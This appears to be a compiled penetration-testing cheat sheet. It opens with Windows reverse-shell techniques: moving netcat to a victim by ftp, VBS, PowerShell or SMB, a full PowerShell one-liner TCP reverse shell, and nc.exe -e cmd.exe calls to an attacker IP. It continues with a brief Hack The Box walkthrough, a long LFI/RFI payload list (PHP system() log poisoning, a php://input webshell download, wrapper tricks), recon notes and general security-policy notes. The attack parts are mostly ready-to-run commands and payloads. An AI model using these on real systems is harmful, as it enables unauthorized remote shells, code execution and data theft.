Windows Non-Interactive Command Execution to Interactive Netcat Reverse Shell

File Transfer with ftp

Hacker Tab1:
nc -nvlp 4444
Hacker Tab2:
//Install python-pyftpdlib to run ftp sever
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
Victim:
echo open 192.168.133.130 21> ftp.txt
echo anonymous>> ftp.txt
echo anonymous>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

nc.exe 192.168.133.130 4444 -e cmd.exe

Transfer shell with VBS

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo  Err.Clear >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo  http.Open "GET", strURL, False >> wget.vbs
echo  http.Send >> wget.vbs
echo  varByteArray = http.ResponseBody >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo  strData = "" >> wget.vbs
echo  strBuffer = "" >> wget.vbs
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo  Next >> wget.vbs
echo  ts.Close >> wget.vbs
 
cscript wget.vbs http://192.168.133.130/nc.exe nc.exe

nc.exe 192.168.133.130 4444 -e cmd.exe

Powershell


echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.133.130/nc.exe" >>wget.ps1
echo $file = "nc1.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

nc1.exe 192.168.133.130 4444 -e cmd.exe

SMB

Hacker Tab1:
nc -nvlp 4444
Hacker Tab2:

Victim:
//net view \\192.168.133.130
//dir \\192.168.133.130\sahi
copy \\192.168.133.130\sahi\nc.exe nc.exe
nc.exe 192.168.133.130 4444 -e cmd
or
\\192.168.133.130\sahi\evil.exe

Powershell One liner Reverse Shell

powershell $client = New-Object System.Net.Sockets.TCPClient("192.168.133.130",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

HTB Lazy Machine – Walthrough

Scanning with nmap

Anonymous ftp account allow read write access to web server home directory.

Lets create meterpreter reverse shell in aspx

Uploading aspx shell using fileZilla ftp client

Triggering uploaded exploit

meterpreter reverse session received

Now, its time for privilege escalation. lets find local exploits for privilege escalation.

Lets try ms10_015_kitrap0d

And we received meterpreter session with NT Authority

Lets grab user CTF

And root CTF

File Inclusion LFI/RFI

Local File Inclusion

?file=../../../../etc/passwd

?file=../../../../etc/passwd%00

?file=../../../../etc/passwd%00jpg

Environment File

/proc/self/environ

Payloads:

User-Agent: <?php system($_GET[‘cmd’]); ?>

?page=/proc/self/environ&cmd=ls

?page=/proc/self/environ&cmd=python –c ‘shell…’

Apache Logs

/var/log/apache2/access.log

../../../../var/log/apache/error.log

Payload

GET /<?php system($_GET[‘cmd’]);?>

SSH Logs

/var/log/auth.log

Payload

ssh <? php system($_GET[‘cmd’]);?>@VICTIM-IM

Sending emails

Mail –s “This is email subject: <?php system($_GET[‘cmd’]);?>” user@domain < /dev/null

Include: /var/mail/user

Php://filter

Index + Index.php

?file=php://filter/read=convert.base64-encode/resource=FILETOREAD

?file=php://filter/read=convert.base64-encode/resource=../../config.php

Php://input

?file=php://input

With post data

<?php system(‘wget http://x.x.x.x/php-shell.php -O /var/www/html/shell.php’); ?>

<?php phpinfo(); ?>

data://

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA2fPg%3d%3d

?file=data:text/plain;,<?php echo shell_exec($_GET[‘cmd’]);?>

zip://

zip://archive.zip#file.php

phar://

/proc/self/fd/#

 

Session Files

/tmp/SeSS ID

/tmp/php5/SessID

Including images

You can append some php code at the end of an image and upload it or include it.

Use encoding

?file=..%2F..%2F..%2F..%2F..%2Fetc/passwd

?file=….//….//….//….//….//etc/passwd

Expect

?file=expect://ls

Note: Null byte injection has been fixed in PHP 5.3.4 (unsupported).

To bypass Null byte fix, make file path bigger than 4096, path truncation vulnerability

?file=../../../etc/passwd/./././././thousand times (./)

Or Reverse Path truncation vulnerability

?file=../../../../(thousand times ./)etc/passwd

Proc File System

/proc/sched_debug // find pid

/proc/mounts

/proc/net/arp

/proc/net/route

/proc/net/tcp  and /proc/net/udp

/proc/net/fib_trie

/proc/version

Query process

/proc/[PID]/cmdline

/proc/[PID]/environ

/proc/[PID]/cwd

/proc/[PID]/fd/[#]  // find error, access log files

 

/proc/self/cmdline

/proc/self/stat

/proc/self/status

/proc/self/fd/[#]

RFI

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(requires allow_url_fopen=On and allow_url_include=On)

Files to check

https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion%20-%20Path%20Traversal/Intruders/List_Of_File_To_Include.txt

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt

https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest.txt

https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest_huge.txt

Windows File Check

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-WinblowsFileCheck.txt

Payloads for File Inclusion

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal

https://github.com/swisskyrepo/PayloadsAllTheThings

References:

https://resources.infosecinstitute.com/local-file-inclusion-code-execution/

https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/

https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/

http://www.securityidiots.com/Web-Pentest/LFI/

http://www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html

https://www.slideshare.net/null0x00/lfi-to-rce

https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/

https://hydrasky.com/network-security/local-file-inclusion-sending-emails-to-remote-code-execution/

https://security.stackexchange.com/questions/136730/local-file-inclusion-to-rce-using-php-file-wrappers

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

https://www.autosectools.com/Local-File-Inclusion-To-Remote-Code-Execution

https://www.codemetrix.net/php-local-file-includes-into-remote/

https://www.notsosecure.com/lfi-code-exec-remote-root/

https://resources.infosecinstitute.com/file-inclusion-attacks/

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

https://securityxploded.com/remote-file-inclusion.php

https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/

https://null-byte.wonderhowto.com/how-to/exploit-php-file-inclusion-web-apps-0179955/

https://www.getastra.com/blog/cms/your-guide-to-defending-against-lfi-and-rfi-attacks/

https://www.cybrary.it/0p3n/local-file-inclusion-command-execution/

https://en.wikipedia.org/wiki/File_inclusion_vulnerability

https://www.imperva.com/docs/hii_remote_and_local_file_inclusion_vulnerabilities.pdf

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

https://xapax.gitbooks.io/security/content/local_file_inclusion.html

https://highon.coffee/blog/lfi-cheat-sheet/

http://securityidiots.com/Web-Pentest/LFI

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

https://nets.ec/File_Inclusion

https://gist.github.com/sckalath/da1a232f362a700ab459

https://evi1us3r.wordpress.com/lfi-cheat-sheet/

http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/

Web Application Information Gathering

1 Conduct Google/Shodan/Censys Discovery and Reconnaissance for Information Leakage
2 Fingerprint Web Server
3 Review Webserver Metafiles for Information Leakage, robots.txt
4 Enumerate Applications on Webserver
5 Review Webpage Comments and Metadata for Information Leakage
6 Identify application entry points
7 Map execution paths through application
8 Fingerprint Web Application Framework
9 Fingerprint Web Application
10 Map Application Architecture
11 Find subdomains
12 Find IP Address for domain
13 Identify WAF
14 Find Real IP address for domain, if applicable

Finding Subdomains

Online websites:
https://pentest-tools.com/information-gathering/find-subdomains-of-domain
https://dnsdumpster.com/
https://hackertarget.com/find-dns-host-records/
https://findsubdomains.com/
https://searchdns.netcraft.com
https://censys.io
Tools:
Subbrute – This is a DNS meta-query spider that pulls DNS records, and subdomains list.
DNScan – A DNS subdomain scanner. This is built on python and can be installed on server.
Sublist3r – An ultra fast domain and subdomain enumeration tool. Also based on python.
Knock – Also known as Knockpy as it is developed in python. Freely available on GitHub.
Recon-Ng – Complex tool with brute_hosts module that facilitates you to bruteforce on domains for subdomains.
DNSRecon – Originally available in Kali Linux.

 

Reverse DNS lookup

“whois lookup registered to” inurl:ip-address-lookup
“whois lookup registered to” inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names

fierce -range 202.147.169.1-205 -dnsserver 8.8.8.8

 

 

 

 

How to find real IP Address of website behind a could based firewall

1- Censys
https://censys.io/
2- Shodan
https://www.shodan.io/
3- zoomeye
https://www.zoomeye.org/
4- securitytrails/dnstrail
https://securitytrails.com/
5- crimeflare
http://crimeflare.com/
6- netcraft
https://toolbar.netcraft.com/site_report
7- dns lookup for MX Record misconfiguration
8- subdomains lookup
9- Website leaking IP address through email headers
10- Reverse lookup ip ranges for target company, and banner grab port 80
11- WordPress Pingback
12- External avatars

Organization Security

Site: is the place where data is backup-ed on drives for lateral use in case of disaster.

Cold Site: Process of bringing servers back in production take time due to lack of facilities like electricity, and network connectivity. But backup is there, that could be used to bring systems back.

Warm Site: is the one with basic facilities which are less than actual production environment. Like electricity, backup generator, network connectivity are there, but speed, volume of facilities slow, allowing only necessary operations.

Hot Site: is exact replica of production environment. Very less down time.

Redundancy Planning

Single point of failure

RAID, redundant array of inexpensive disks

Redundant servers, ISP

UPS

Backup generators

Spare Parts( like hard disk of server)

Disruptions:

1- Non disaster

2- Disator

3- Catastrophic

Disaster Recovery Procedures

Planning

Exercises

Backup and storage

Restoration

Incident Response

  • Incident response defined
  • Forensics
  • Chain of Custody
  • First Response
  • Damage/Loss

 

Secure Disposal, paper shredder, hard drive shredder

AUP, acceptable use policy

Mandatory Vacations, force you to create rotation of duties

PII, personally identifiable information, should not go in wrong hands.

Due Care,

Due diligence, reasonable steps taken by person to avoid offense.

Due process,

SLA, Service Level Agreement, agreement between you and your company.

Social Engineering

Phishing

Hoaxes

Dumpster diving

End user awareness